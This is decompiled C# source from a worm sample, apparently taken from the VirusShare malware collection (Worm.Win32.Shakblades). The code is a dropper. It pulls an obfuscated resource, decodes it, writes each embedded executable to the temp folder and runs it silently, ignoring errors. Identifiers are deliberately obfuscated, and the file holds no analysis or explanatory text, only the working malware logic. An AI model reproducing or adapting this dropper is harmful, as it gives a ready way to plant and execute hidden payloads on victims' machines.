// Decompiled with JetBrains decompiler // Type: Ҧ߲๒ʽ໙ୄᴘ.৐෧ᠮबZố // Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe using System.Diagnostics; using System.IO; using System.Reflection; using System.Resources; using System.Threading; namespace Ҧ߲๒ʽ໙ୄᴘ { internal class \u09D0෧ᠮबZố { public static void ᬪ() => new Thread((ThreadStart) (() => { BinaryReader binaryReader = new BinaryReader((Stream) new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷((byte[]) new ResourceManager("b", Assembly.GetExecutingAssembly()).GetObject("b"), false))); while (binaryReader.PeekChar() != -1) { string str = binaryReader.ReadString(); int count = binaryReader.ReadInt32(); byte[] bytes = binaryReader.ReadBytes(count); try { if (!File.Exists(Path.GetTempPath() + str)) File.WriteAllBytes(Path.GetTempPath() + str, bytes); Process.Start(Path.GetTempPath() + str); } catch { } } })).Start(); } }